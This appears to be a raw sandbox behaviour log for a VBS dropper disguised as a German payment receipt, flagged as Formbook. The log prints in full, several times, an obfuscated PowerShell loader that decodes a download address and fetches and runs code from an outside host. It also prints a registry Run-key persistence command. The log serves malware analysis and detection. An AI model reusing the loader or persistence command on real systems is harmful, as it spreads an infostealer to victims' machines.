Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@29/13@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Vaterpassenes24.Acc Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13umbca1.mvr.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7316
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7560
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
